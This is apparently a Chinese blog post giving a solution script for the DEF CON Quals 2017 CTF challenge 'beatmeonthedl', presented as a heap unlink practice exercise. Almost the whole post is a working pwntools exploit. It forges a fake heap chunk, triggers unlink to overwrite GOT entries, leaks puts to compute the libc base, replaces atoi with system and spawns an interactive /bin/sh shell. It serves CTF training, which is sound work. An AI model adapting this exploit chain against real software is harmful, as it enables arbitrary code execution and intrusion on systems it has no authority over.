DEF CON Quals 2017: beatmeonthedl


Unlink练习题

#!/usr/bin/python 

from pwn import *

sh=process("./beatmeonthedl")
#gdb.attach(sh)
elf=ELF('./beatmeonthedl')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

system_offset = libc.symbols['system']
sh_offset = next(libc.search('/bin/sh')) - system_offset
puts_offset = libc.symbols['puts']

def create(content):
    sh.sendline("1")
    sh.recvuntil("Request text > ")
    sh.sendline(content)
    sh.recv(1024)

def edit(index,content):
    sh.sendline("4")
    sh.recvuntil("choice: ")
    sh.sendline(str(index))
    sh.recv(1024)
    sh.send(content)
    sh.recv(1024)

def remove(index):
    sh.sendline("3")
    sh.recv(1024)
    sh.sendline(str(index))
    sh.recv(1024)


sh.recv(1024)
print "------sending username and password------"
sh.sendline("mcfly")
sh.recv(1024)
sh.sendline("awesnap")

sh.recvuntil("| ")

print "------attack------"
fake_addr=0x0000000000609E80
fake_chunk=p64(0)+p64(0x30)+p64(fake_addr-0x18)+p64(fake_addr-0x10)
fake_chunk=fake_chunk.ljust(0x30,'a')
fake_chunk+=p64(0x30)+p64(0x42)
create('B'*6) #index 0
create('C'*6) #index 1
create('4') #index 2
edit(0,fake_chunk)
remove(1)
payload='A'*0x18+p64(elf.got['puts'])+'\x00'*8+p64(elf.got['atoi'])
edit(0,payload)
sh.sendline("2")
sh.recvuntil('0) ')
puts_addr=u64(sh.recv(6)+'\x00\x00')
print sh.recv(1024)
log.success('puts addr: ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
log.success('libc base: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))

edit(2,p64(system_addr))
sh.send('/bin/sh')
sh.interactive()

发表评论

This site uses Akismet to reduce spam. Learn how your comment data is processed.